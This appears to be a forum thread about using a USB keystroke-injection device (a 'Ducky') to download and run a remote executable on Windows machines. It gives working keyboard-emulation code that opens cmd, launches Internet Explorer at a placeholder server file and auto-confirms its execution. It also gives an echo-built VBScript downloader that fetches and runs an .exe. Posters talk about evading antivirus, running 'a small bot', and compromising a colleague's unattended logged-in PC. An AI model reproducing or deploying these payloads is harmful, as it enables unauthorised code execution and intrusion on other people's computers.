[[Version 1] Downloading File With Ducky]

Sorry do not get me wrong, I love the fact that you guys are actively talking and working on the Vb-script.

I am just working on every way i can think of downloading a file using Ducky. To me Ducky is more of a crafted tool less of a hacksaw own everything. More of a i got a target so let me use vb script to download files if they do not have and AV that blocks it or let me use the Explorer method. I'm Hoping in the long run people will take the information in this thread and add it to wiki as download methods (I will do it once the wiki is up and i find the time).

Thank all of you for looking into these methods and helping me refine them!

** I tested out the Vb script at work and it works flawless on are test system.

[[Version 1] Downloading File With Ducky]

void setup() { } // no setup needed
void loop() {
  delay(10000);
  // Windows key  
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  // Windows Key + R to open run
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //delay for computer
  delay(500);
  //send cmd into run
  Keyboard.print("cmd");
  // for the computer
  delay(50);
  // This hits the enter key
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //Testing Delay
  delay(500);
  //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // another delay :)
  delay(100);
  
    //Send exit to cmd.
  Keyboard.print("exit");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //this stops it from re running for a bit
  delay(500000);
  
}

This is code that i have tested on 4 systems here win7 twice and vista twice.

This executes explorer and downloads the file running it in the process.

will change it up so that i can do it all from the run prompt.

Tell me what you guys think. O yeah got the Ducky today thing works like a charm.

Change a line in the code.

Now:
 //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");

To:
 //Send to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe && exit");

**Thanks to fjux for showing me that "&&" works in Windows to add another command.

This will close CMD after lunching explorer.

This code is tested and works better then before.

With about 15 seconds, i can compromise a system. IT guy at work logs into my system then somehow i make him look away plug this bad boy in and bam! j/king would never use this for "evil".

Requests: Can some of you guys that have one do some testing on the delay timers and see what you guys find it the best amount of time. All of the ones i have set up are there for testing so there a bit long.

[[Version 1] Downloading File With Ducky]

void setup() { } // no setup needed
void loop() {
  delay(10000);
  // Windows key  
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  // Windows Key + R to open run
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //delay for computer
  delay(500);
  //send cmd into run
  Keyboard.print("cmd");
  // for the computer
  delay(50);
  // This hits the enter key
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //Testing Delay
  delay(500);
  //Send exit to cmd.
  Keyboard.print("\"c:\\Program Files\\Internet Explorer\\iexplore.exe\" www.YOURSERVER/nox404/THEFILE.exe");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //ALT-R
  delay(3000);
  Keyboard.set_key1(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now();
  // releases the keys
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  // another delay :)
  delay(100);
  
    //Send exit to cmd.
  Keyboard.print("exit");
  
  //  Hits Enter key
  delay(50);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  Keyboard.set_key1(0);
  Keyboard.send_now();
  //this stops it from re running for a bit
  delay(500000);
  
}

This is code that i have tested on 4 systems here win7 twice and vista twice.

This executes explorer and downloads the file running it in the process.

will change it up so that i can do it all from the run prompt.

Tell me what you guys think. O yeah got the Ducky today thing works like a charm.

[[Version 1] Downloading File With Ducky]

Yes, this is very true that AVs will find it. I was thinking of using windows built in ftp but the firewall by default blocks it.

How about this guys.

<start from cmd>

prompt>> "C:\Program Files\Internet Explorer\iexplore.exe" www.YOURSERVER.info/nox404/test.exe
alt-r
alt-r
prompt>> exit

I tested this with internet explorer 8.

This will open internet explore to a file. From there it will ask you to run download etc... you hit alt-r this will run the .exe and then again alt-r. at this point you will have executed the file. Then type exit walk away.

This happens very fast the IE window dos not stay open it will close on its own. I tested this out with a small bot (10kb) and it worked great almost instantaneous.

What do you guy think?

PS. I will be getting my ducky today(at least that what UPS says). Then i can start testing out real world applications.

[[Version 1] Downloading File With Ducky]

tested it on windows xp vista and win7 all of it works.

[[Version 1] Downloading File With Ducky]

Maybe something like this would work have the duck load up cmd and type in...

echo Dim DataBin >dl.vbs
echo Dim HTTPGET >>dl.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
echo HTTPGET.Send >>dl.vbs
echo DataBin = HTTPGET.ResponseBody >>dl.vbs
echo Const adTypeBinary=1 >>dl.vbs
echo Const adSaveCreateOverWrite=2 >>dl.vbs
echo Dim test1 >>dl.vbs
echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
echo test1.Type = adTypeBinary >>dl.vbs
echo test1.Open >>dl.vbs
echo test1.Write DataBin >>dl.vbs
echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
dl.vbs
file.exe
exit

this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good.

I Will be testing it here soon once my ducky gets here.

Tell me what you guys think?